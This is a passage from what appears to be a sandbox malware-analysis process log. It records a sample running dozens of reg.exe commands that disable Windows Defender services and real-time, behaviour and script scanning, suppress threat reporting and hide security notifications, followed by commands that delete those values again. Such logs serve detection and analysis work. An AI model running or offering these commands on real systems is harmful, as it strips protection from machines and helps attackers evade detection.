  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:4540
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f
    3⤵
    PID:10576
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:11032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:7408
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:9784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5304
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies registry key
    PID:9660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:9160
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:9768
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:8488
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:10008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5780
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:10124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:2616
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies registry key
    PID:10712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:3224
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:11088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:8908
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:11208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:916
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:9900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:8312
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %C:\Windows%\system32\SecurityHealthSystray.exe /f
    3⤵
    - Adds Run key to start application
    PID:9420
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\System32\OneDriveSetup.exe
    3⤵
    PID:9608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:6260
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe
    3⤵
    PID:10780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  PID:7408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    PID:10288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:9868
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:9836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:6824
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:3288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:7272
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:8396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:10104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:6428
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:10280
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:8660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:9976
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5560
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:10652
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:9012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:8704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:9352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:10808
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:10964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:10732
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:6900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:10184
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:5704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:10684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:10816
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:10464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:9220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:9820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:10836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:10832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:10744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:10876
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:8152
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:2216
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:10680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:9368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:10828
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:1016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:7812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:7252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:10576
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:6056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:3316
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:5364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:8816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:7640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:4368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:7480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:6932
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:10708
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    PID:9048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:8376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:4804
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:3988
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:8312
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:9192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:8848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:7452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:8044
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:3604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:5620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:8712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:10668
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:8924
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:4328
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:7412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:7628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:5812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:7436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:7064
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:4280
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:8496
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:10864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2460
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:10524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:6412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:5944
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:6640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:6156
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:4772
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:6092
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    PID:10520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:5384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:7808
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:8804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:5524
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    PID:5460
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:6436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:6152
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:5612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:5936
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:8616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:6952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:7092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
